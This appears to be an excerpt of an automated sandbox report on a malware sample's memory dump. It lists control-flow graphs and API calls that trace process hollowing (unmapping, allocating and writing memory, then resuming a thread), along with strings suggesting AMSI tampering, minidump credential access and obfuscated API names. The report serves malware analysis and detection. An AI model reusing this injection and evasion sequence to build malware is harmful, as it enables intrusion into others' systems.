2bc19a4 26861->26866 26862 2bc16bf 26862->26852 26863->26857 26865 2bc1820 Sleep 26863->26865 26864->26866 26865->26858 26867->26868 26869->26862

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 6798 2bd8ba8-2bd8bab 6799 2bd8bb0-2bd8bb5 6798->6799 6799->6799 6800 2bd8bb7-2bd8c9e call 2bc493c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c 6799->6800 6831 2bda6ef-2bda759 call 2bc44d0 * 2 call 2bc4c0c call 2bc44d0 call 2bc44ac call 2bc44d0 * 2 6800->6831 6832 2bd8ca4-2bd8d7f call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c 6800->6832 6832->6831 6875 2bd8d85-2bd90ad call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc30d4 * 2 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc4d8c call 2bc4d9c call 2bd85d4 6832->6875 6984 2bd90af-2bd911b call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c 6875->6984 6985 2bd9120-2bd9441 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc2ee0 call 2bc2f08 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c GetThreadContext 6875->6985 6984->6985 6985->6831 7093 2bd9447-2bd96aa call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bd824c 6985->7093 7166 2bd99b7-2bd9a23 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c 7093->7166 7167 2bd96b0-2bd9819 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bd84bc 7093->7167 7195 2bd9a28-2bd9ba8 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bd79ac 7166->7195 7256 2bd981b-2bd9841 call 2bd79ac 7167->7256 7257 2bd9843-2bd98af call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c 7167->7257 7195->6831 7298 2bd9bae-2bd9ca7 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bd8ab8 7195->7298 7266 2bd98b4-2bd99ab call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bd79ac 7256->7266 7257->7266 7337 2bd99b0-2bd99b5 7266->7337 7349 2bd9ca9-2bd9cf6 call 2bd89b0 call 2bd89a4 7298->7349 7350 2bd9cfb-2bda453 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bd7cf8 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bd7cf8 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c SetThreadContext NtResumeThread call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc2c2c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bd8798 * 3 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c 7298->7350 7337->7195 7349->7350 7575 2bda458-2bda6ea call 2bd8798 * 2 call 2bc480c call 2bc494c call 2bc4798 call 2bc494c call 2bd8798 call 2bc480c call 2bc494c call 2bc4798 call 2bc494c call 2bd8798 * 5 call 2bc480c call 2bc494c call 2bc4798 call 2bc494c call 2bd8798 call 2bc480c call 2bc494c call 2bc4798 call 2bc494c call 2bd8798 call 2bc480c call 2bc494c call 2bc4798 call 2bc494c call 2bd8798 call 2bc480c call 2bc494c call 2bc4798 call 2bc494c call 2bd8798 call 2bd7ecc call 2bd8798 * 2 7350->7575 7575->6831
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02BD881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02BD8903), ref: 02BD8860
                                                                                                                                • Part of subcall function 02BD881C: GetProcAddress.KERNEL32(02C21384,00000000), ref: 02BD8879
                                                                                                                                • Part of subcall function 02BD881C: FreeLibrary.KERNEL32(02C21384,00000000,02C21388,Function_000055D8,00000004,02C21398,02C21388,000186A3,00000040,02C2139C,02C21384,00000000,00000000,00000000,00000000,02BD8903), ref: 02BD88E3
                                                                                                                                • Part of subcall function 02BD85D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02BD8660
                                                                                                                              • GetThreadContext.KERNEL32(02C213D0,02C21420,ScanString,02C213A4,02BDA774,UacInitialize,02C213A4,02BDA774,ScanBuffer,02C213A4,02BDA774,ScanBuffer,02C213A4,02BDA774,UacInitialize,02C213A4), ref: 02BD943A
                                                                                                                                • Part of subcall function 02BD824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BD82BD
                                                                                                                                • Part of subcall function 02BD84BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02BD8521
                                                                                                                                • Part of subcall function 02BD79AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02BD7A1F
                                                                                                                                • Part of subcall function 02BD7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BD7D6C
                                                                                                                              • SetThreadContext.KERNEL32(02C213D0,02C21420,ScanBuffer,02C213A4,02BDA774,ScanString,02C213A4,02BDA774,Initialize,02C213A4,02BDA774,02C213CC,02C214BC,02C214F8,00000004,02C214FC), ref: 02BDA14F
                                                                                                                              • NtResumeThread.NTDLL(02C213D0,00000000), ref: 02BDA15C
                                                                                                                                • Part of subcall function 02BD8798: LoadLibraryW.KERNEL32(?,?), ref: 02BD87AC
                                                                                                                                • Part of subcall function 02BD8798: GetProcAddress.KERNEL32(02C21390,BCryptVerifySignature), ref: 02BD87C6
                                                                                                                                • Part of subcall function 02BD8798: FreeLibrary.KERNEL32(02C21390,02C21390,BCryptVerifySignature,bcrypt,?,02C213D0,00000000,02C213A4,02BDA3BF,ScanString,02C213A4,02BDA774,ScanBuffer,02C213A4,02BDA774,Initialize), ref: 02BD8802
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryMemoryThreadVirtual$AddressContextFreeProc$AllocateCreateHandleLoadModuleProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                              • API String ID: 59011937-51457883
                                                                                                                              • Opcode ID: 40dc1fbfbe95da9112a22910634a23e1805963d16f57499f863223af05412df9
                                                                                                                              • Instruction ID: cad1e3d4940afcf83214ad28eb64d7d352c1101e326de7ce0b0bb84998198b24
                                                                                                                              • Opcode Fuzzy Hash: 40dc1fbfbe95da9112a22910634a23e1805963d16f57499f863223af05412df9
                                                                                                                              • Instruction Fuzzy Hash: 2BE2FC35B501299FDB11FB64CDA0BDE73BAAF85300F2145F6A109AB214EE74AF468F50

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 7653 2bd8ba6-2bd8bab 7655 2bd8bb0-2bd8bb5 7653->7655 7655->7655 7656 2bd8bb7-2bd8c9e call 2bc493c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c 7655->7656 7687 2bda6ef-2bda759 call 2bc44d0 * 2 call 2bc4c0c call 2bc44d0 call 2bc44ac call 2bc44d0 * 2 7656->7687 7688 2bd8ca4-2bd8d7f call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c 7656->7688 7688->7687 7731 2bd8d85-2bd90ad call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc30d4 * 2 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc4d8c call 2bc4d9c call 2bd85d4 7688->7731 7840 2bd90af-2bd911b call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c 7731->7840 7841 2bd9120-2bd9441 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc46a4 * 2 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc2ee0 call 2bc2f08 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c GetThreadContext 7731->7841 7840->7841 7841->7687 7949 2bd9447-2bd96aa call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bd824c 7841->7949 8022 2bd99b7-2bd9a23 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c 7949->8022 8023 2bd96b0-2bd9819 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bd84bc 7949->8023 8051 2bd9a28-2bd9ba8 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bd79ac 8022->8051 8112 2bd981b-2bd9841 call 2bd79ac 8023->8112 8113 2bd9843-2bd98af call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c 8023->8113 8051->7687 8154 2bd9bae-2bd9ca7 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bd8ab8 8051->8154 8122 2bd98b4-2bd99b5 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bd79ac 8112->8122 8113->8122 8122->8051 8205 2bd9ca9-2bd9cf6 call 2bd89b0 call 2bd89a4 8154->8205 8206 2bd9cfb-2bda6ea call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bd7cf8 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bd7cf8 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c SetThreadContext NtResumeThread call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bc2c2c call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bd8798 * 3 call 2bc480c call 2bc494c call 2bc46a4 call 2bc4798 call 2bc494c call 2bc46a4 call 2bd881c call 2bd8798 * 2 call 2bc480c call 2bc494c call 2bc4798 call 2bc494c call 2bd8798 call 2bc480c call 2bc494c call 2bc4798 call 2bc494c call 2bd8798 * 5 call 2bc480c call 2bc494c call 2bc4798 call 2bc494c call 2bd8798 call 2bc480c call 2bc494c call 2bc4798 call 2bc494c call 2bd8798 call 2bc480c call 2bc494c call 2bc4798 call 2bc494c call 2bd8798 call 2bc480c call 2bc494c call 2bc4798 call 2bc494c call 2bd8798 call 2bd7ecc call 2bd8798 * 2 8154->8206 8205->8206 8206->7687
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02BD881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02BD8903), ref: 02BD8860
                                                                                                                                • Part of subcall function 02BD881C: GetProcAddress.KERNEL32(02C21384,00000000), ref: 02BD8879
                                                                                                                                • Part of subcall function 02BD881C: FreeLibrary.KERNEL32(02C21384,00000000,02C21388,Function_000055D8,00000004,02C21398,02C21388,000186A3,00000040,02C2139C,02C21384,00000000,00000000,00000000,00000000,02BD8903), ref: 02BD88E3
                                                                                                                                • Part of subcall function 02BD85D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02BD8660
                                                                                                                              • GetThreadContext.KERNEL32(02C213D0,02C21420,ScanString,02C213A4,02BDA774,UacInitialize,02C213A4,02BDA774,ScanBuffer,02C213A4,02BDA774,ScanBuffer,02C213A4,02BDA774,UacInitialize,02C213A4), ref: 02BD943A
                                                                                                                                • Part of subcall function 02BD824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BD82BD
                                                                                                                                • Part of subcall function 02BD84BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02BD8521
                                                                                                                                • Part of subcall function 02BD79AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02BD7A1F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryVirtual$AddressAllocateContextCreateFreeHandleLibraryModuleProcProcessReadSectionThreadUnmapUserView
                                                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                              • API String ID: 1291004003-51457883
                                                                                                                              • Opcode ID: 7b9a7f3061fd84d32f8dfe4b75c66ca7d9707f72aeae931f52c906fd47542e41
                                                                                                                              • Instruction ID: fdfb04b08f76e8ea698f3b3f46043c8e55a186844e115d206214161a9f0cfc56
                                                                                                                              • Opcode Fuzzy Hash: 7b9a7f3061fd84d32f8dfe4b75c66ca7d9707f72aeae931f52c906fd47542e41
                                                                                                                              • Instruction Fuzzy Hash: 7FE2FC35B501289FDB11FB64CDA0BDE73BAAF85300F2145F6A109AB214EE74AF468F50

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 8509 2bc5a78-2bc5ab9 GetModuleFileNameA RegOpenKeyExA 8510 2bc5afb-2bc5b3e call 2bc58b4 RegQueryValueExA 8509->8510 8511 2bc5abb-2bc5ad7 RegOpenKeyExA 8509->8511 8516 2bc5b40-2bc5b5c RegQueryValueExA 8510->8516 8517 2bc5b62-2bc5b7c RegCloseKey 8510->8517 8511->8510 8512 2bc5ad9-2bc5af5 RegOpenKeyExA 8511->8512 8512->8510 8514 2bc5b84-2bc5bb5 lstrcpyn GetThreadLocale GetLocaleInfoA 8512->8514 8518 2bc5c9e-2bc5ca5 8514->8518 8519 2bc5bbb-2bc5bbf 8514->8519 8516->8517 8522 2bc5b5e 8516->8522 8520 2bc5bcb-2bc5be1 lstrlen 8519->8520 8521 2bc5bc1-2bc5bc5 8519->8521 8523 2bc5be4-2bc5be7 8520->8523 8521->8518 8521->8520 8522->8517 8524 2bc5be9-2bc5bf1 8523->8524 8525 2bc5bf3-2bc5bfb 8523->8525 8524->8525 8526 2bc5be3 8524->8526 8525->8518 8527 2bc5c01-2bc5c06 8525->8527 8526->8523 8528 2bc5c08-2bc5c2e lstrcpyn LoadLibraryExA 8527->8528 8529 2bc5c30-2bc5c32 8527->8529 8528->8529 8529->8518 8530 2bc5c34-2bc5c38 8529->8530 8530->8518 8531 2bc5c3a-2bc5c6a lstrcpyn LoadLibraryExA 8530->8531 8531->8518 8532 2bc5c6c-2bc5c9c lstrcpyn LoadLibraryExA 8531->8532 8532->8518
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02BC5A94
                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02BC5AB2
                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02BC5AD0
                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02BC5AEE
                                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02BC5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02BC5B37
                                                                                                                              • RegQueryValueExA.ADVAPI32(?,02BC5CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02BC5B7D,?,80000001), ref: 02BC5B55
                                                                                                                              • RegCloseKey.ADVAPI32(?,02BC5B84,00000000,00000000,00000005,00000000,02BC5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02BC5B77
                                                                                                                              • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02BC5B94
                                                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02BC5BA1
                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02BC5BA7
                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02BC5BD2
                                                                                                                              • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02BC5C19
                                                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02BC5C29
                                                                                                                              • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02BC5C51
                                                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02BC5C61
                                                                                                                              • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02BC5C87
                                                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02BC5C97
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                              • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                              • API String ID: 1759228003-3917250287
                                                                                                                              • Opcode ID: 38d8ff04b9ec65f6d790a7be8c1bb73e018a51f3cd92f139fd218c4c6239170e
                                                                                                                              • Instruction ID: 8b71aab6f7b756b2d16e26a7efb957684dbfbcd238b8af7dd36fadc4cca1c061
                                                                                                                              • Opcode Fuzzy Hash: 38d8ff04b9ec65f6d790a7be8c1bb73e018a51f3cd92f139fd218c4c6239170e
                                                                                                                              • Instruction Fuzzy Hash: 68516475A5020C7AFB21DAA8CC46FEFBBADDB04744FA001E9A644F6181D674EA448F60

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02BD8018: GetModuleHandleA.KERNELBASE(?), ref: 02BD806A
                                                                                                                                • Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02BD8113
                                                                                                                                • Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(?,?), ref: 02BD8125
                                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02BD7A1F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$AllocateHandleMemoryModuleVirtual
                                                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                              • API String ID: 1888340430-445027087
                                                                                                                              • Opcode ID: 4824cfda16176e584cf01071ca44b6d08062248a9e7583e4122cd270a408f507
                                                                                                                              • Instruction ID: 5a701c672de648745467baf5bb1a9a90acaa1607ccbc0c3f3bccb6799cd7c541
                                                                                                                              • Opcode Fuzzy Hash: 4824cfda16176e584cf01071ca44b6d08062248a9e7583e4122cd270a408f507
                                                                                                                              • Instruction Fuzzy Hash: 85116D75640208BFEB10EFA4DC51FDEB7BEEB48710F6144A5B908D7640EAB0AB149B60

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02BD8018: GetModuleHandleA.KERNELBASE(?), ref: 02BD806A
                                                                                                                                • Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02BD8113
                                                                                                                                • Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(?,?), ref: 02BD8125
                                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02BD7A1F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd
                                                                                                                              Similarity
